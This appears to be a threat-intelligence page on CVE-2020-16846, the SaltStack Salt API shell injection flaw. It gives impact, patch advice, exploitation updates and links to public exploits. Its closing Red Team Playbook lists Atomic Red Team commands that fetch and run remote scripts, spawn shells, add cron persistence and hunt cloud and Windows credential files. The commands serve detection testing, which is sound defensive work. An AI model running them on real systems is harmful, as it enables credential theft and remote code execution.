CVE-2020-16846
Overview
This vulnerability is a shell injection flaw arising from improper input sanitization in the SaltStack Salt API when the SSH client feature is enabled. The root cause lies in the API's handling of crafted web requests that directly pass unsanitized input to shell commands executed via the SSH client component. This affects SaltStack Salt versions up to and including 3002, specifically targeting the Salt API's request processing mechanism.
Vulnerability Description
An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.
Impact
An unauthenticated attacker with network access to the Salt API can execute arbitrary shell commands on the Salt master server, resulting in full system compromise. This includes the ability to control all managed systems under SaltStack's administration, enabling lateral movement and persistent access. No user interaction or credentials are required, making exploitation straightforward in exposed environments. The compromise can lead to data breaches, disruption of managed infrastructure, and complete loss of system integrity.
Solution
Users should upgrade SaltStack Salt to versions later than 3002 where this vulnerability is addressed. Specific vendor advisories include Debian DSA-4837, Gentoo GLSA-202011-13, and openSUSE security announcement 2020-11-29. Detailed patch instructions and updates are available at the official SaltStack GitHub releases page and the referenced vendor advisories. Applying these updates or disabling the SSH client feature in the Salt API until patched are recommended mitigation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SaltStack Salt, particularly affecting versions up to 3002, presents a critical security flaw that allows for shell injection through the Salt API when the SSH client is enabled. This issue arises from improper handling of crafted web requests, which can be manipulated by an attacker to execute arbitrary commands on the server. The underlying problem lies in the way user input is processed without adequate sanitization, enabling an attacker to inject malicious payloads that can compromise the integrity of the system. Given the robust capabilities of Salt for configuration management and orchestration, the potential for exploitation is significant, as it can lead to unauthorized access and control over the affected systems.
Attack vectors for this vulnerability are primarily web-based, where an attacker can send specially crafted requests to the Salt API. By leveraging the SSH client functionality, the attacker can execute commands on the server, leading to a complete compromise of the system. Scenarios may include an attacker targeting a poorly secured Salt API endpoint, potentially gaining access to sensitive data or executing commands that could disrupt services or manipulate configurations. The ease of exploitation, combined with the high privileges typically associated with Salt operations, makes this vulnerability particularly dangerous. Attackers can automate these requests, increasing the likelihood of successful exploitation in environments where Salt is widely deployed.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on Salt for managing large-scale infrastructure. A successful exploitation could lead to unauthorized access to critical systems, data breaches, or even the complete takeover of the infrastructure. The business risks associated with such an incident are substantial, including financial losses, reputational damage, and regulatory repercussions, particularly in sectors that handle sensitive information. Organizations may face downtime, loss of customer trust, and the costs associated with incident response and remediation efforts. The high CVSS score of 9.8 underscores the urgency for organizations to address this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that all instances of Salt are updated to the latest version, where the vulnerability has been patched. Regularly reviewing and hardening API configurations can also help minimize exposure to potential attacks. Employing web application firewalls (WAFs) to monitor and filter incoming traffic can provide an additional layer of security, detecting and blocking malicious requests before they reach the API. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively. Educating staff about secure coding practices and the importance of input validation can also play a significant role in preventing similar vulnerabilities in the future.
In conclusion, the vulnerability present in SaltStack Salt represents a critical risk that can have severe implications for affected organizations. The potential for shell injection through the Salt API highlights the need for robust security practices and timely updates to safeguard against exploitation. By understanding the technical details, attack vectors, and real-world impacts of this vulnerability, organizations can better prepare themselves to defend against such threats and mitigate the associated risks effectively.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2020-16846, indicating a modest resurgence in attempts to exploit the SaltStack Salt API vulnerability. While the overall exploit landscape remains stable, this subtle uptick suggests that adversaries continue to probe for opportunities to leverage the shell injection flaw, despite the availability of patches across multiple versions. The presence of publicly accessible proof-of-concept exploits and a Metasploit module facilitates easier weaponization, maintaining the vulnerability’s attractiveness to threat actors. Although no significant change in ransomware usage linked to this vulnerability has been observed, the persistent exploitation attempts underscore the critical nature of timely patching and monitoring. Consequently, the threat level remains high, with the slight increase in activity reinforcing the need for vigilance among defenders to detect and respond to potential intrusions exploiting this critical weakness.
Update 2 — May 15, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2020-16846, reflected by a marked increase in telemetry signals from our sensors. This uptick indicates renewed adversary interest in leveraging the SaltStack Salt API vulnerability, despite the availability of patches and existing mitigation guidance. The persistence of publicly accessible proof-of-concept exploits and a mature Metasploit module continues to lower the barrier for threat actors, facilitating more frequent and potentially automated attack campaigns. Although ransomware groups have not been directly linked to this vulnerability, the increased exploitation activity elevates the risk of unauthorized command execution, which could serve as a foothold for broader intrusion efforts. Consequently, the threat level associated with CVE-2020-16846 has intensified, underscoring the critical need for defenders to maintain heightened vigilance and robust detection capabilities to identify and respond to exploitation attempts promptly.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2020-16846, indicating a modest resurgence in attacker interest. While the overall trend remains stable, this uptick suggests that threat actors continue to probe vulnerable SaltStack Salt API instances, potentially leveraging existing public exploits and Metasploit modules. The persistence of these activities, despite patches being available for affected versions, underscores ongoing challenges in patch management and vulnerability remediation within operational environments. Although no direct linkage to ransomware campaigns has emerged, the elevated exploitation frequency heightens the risk of unauthorized command execution, which could facilitate lateral movement or further compromise. Consequently, the threat level associated with this vulnerability remains critical, with the recent telemetry reinforcing the need for sustained detection efforts to identify and mitigate exploitation attempts promptly.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | 3001 |
cpe:2.3:a:saltstack:salt:3001:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | 3002 |
cpe:2.3:a:saltstack:salt:3002:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.1 |
cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SaltStack Salt REST API Arbitrary Command Execution
exploits/linux/http/saltstack_salt_api_cmd_exec
|
KPC, wvu | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zomy22/CVE-2020-16846-Saltstack-Salt-API
|
zomy22 | 0 | 0 | 2021-10-14 | View |
|
hamza-boudouche/projet-secu
CVE-2020-16846
|
hamza-boudouche | 0 | 0 | 2022-12-12 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.